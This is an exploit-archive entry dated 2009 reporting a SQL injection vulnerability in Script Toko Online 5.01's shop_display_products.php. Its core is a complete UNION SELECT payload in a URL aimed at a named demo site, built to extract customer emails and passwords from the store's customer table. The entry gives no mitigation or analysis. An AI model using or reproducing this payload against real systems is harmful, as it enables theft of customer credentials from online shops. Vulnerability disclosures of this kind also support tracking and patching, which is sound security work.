Script Toko Online 5.01 (shop_display_products.php) SQL Injection Vuln

2009-01-26T00:00:00
ID 1337DAY-ID-4731
Type zdt
Reporter k1n9k0ng
Modified 2009-01-26T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================================
Script Toko Online 5.01 (shop_display_products.php) SQL Injection Vuln
======================================================================



+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : Script Toko Online Vs.5.01
Scripts site    : http://www.gempar.com/
Discovered By   : k1n9k0ng
My Site         : http://www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Demo Site :
http://www.gempar.com/demotoko/

Bug Found:
http://www.gempar.com/demotoko/shop_display_products.php?cat_id=-1 union select concat(email,0x3a,password),1,2,3,4,5,6,7 from naxtor_cart_store_customer/*




#  0day.today [2018-02-07]  #